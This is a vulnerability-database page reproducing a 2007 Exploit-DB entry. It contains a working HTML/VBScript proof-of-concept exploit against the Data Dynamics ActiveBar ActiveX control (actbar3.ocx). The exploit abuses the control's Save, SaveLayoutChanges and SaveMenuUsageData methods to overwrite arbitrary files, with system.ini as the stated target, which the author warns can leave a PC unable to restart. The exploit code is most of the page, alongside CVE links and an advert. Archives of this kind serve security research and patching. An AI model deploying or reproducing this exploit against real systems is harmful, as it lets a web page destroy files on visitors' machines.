Lucene search

K

Data Dynamics ActiveBar - ActiveX 'actbar3.ocx 3.1' Insecure Methods

🗓️ 17 Jul 2007 00:00:00Reported by shinnaiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 57 Views

Data Dynamics ActiveBar ActiveX 'actbar3.ocx 3.1' Insecure Method

Show more
Related
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2007-3883
18 Jul 200723:30
nvd
NVD
CVE-2011-1207
5 May 201102:39
nvd
Prion
Security feature bypass
18 Jul 200723:30
prion
Prion
Information disclosure
5 May 201102:39
prion
CVE
CVE-2007-3883
18 Jul 200723:30
cve
CVE
CVE-2011-1207
5 May 201102:39
cve
Exploit DB
Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods
7 Apr 200800:00
exploitdb
Check Point Advisories
ActiveBar ActiveX Method Arbitrary File Write - Ver2 (CVE-2007-3883)
28 Dec 201400:00
checkpoint_advisories
Cvelist
CVE-2007-3883
18 Jul 200723:00
cvelist
Cvelist
CVE-2011-1207
5 May 201101:00
cvelist
Rows per page
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">---------------------------------------------------------------------------------------
 <b>Data Dynamics ActiveBar ActiveX Control (actbar3.ocx <= 3.1) Multiple Inscure Methods</b>
 url: http://www.datadynamics.com/default.aspx

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not be responsible for any damage.
 
 <b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
 IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.

 <b>This control is marked as:
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 Implements IObjectSafety: False
 KillBitSet: False</b>
---------------------------------------------------------------------------------------

<object classid='clsid:5407153D-022F-4CD2-8BFF-465569BC5DB8' id='test'></object>

<select style="width: 404px" name="Pucca">
  <option value = "Save">Save</option>
  <option value = "SaveLayoutChanges">SaveLayoutChanges</option>
  <option value = "SaveMenuUsageData">SaveMenuUsageData</option>
</select>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   Dim MyMsg
   if Pucca.value = "Save" then
    test.Save "", "c:\carlo1.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   elseif Pucca.value = "SaveLayoutChanges" then
    test.SaveLayoutChanges "c:\carlo2.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   elseif Pucca.value = "SaveMenuUsageData" then
    test.SaveMenuUsageData "c:\carlo3.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   end if

 End Sub
</script>

</span></span>
</code></pre>

# milw0rm.com [2007-07-17]

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
57
.json
Report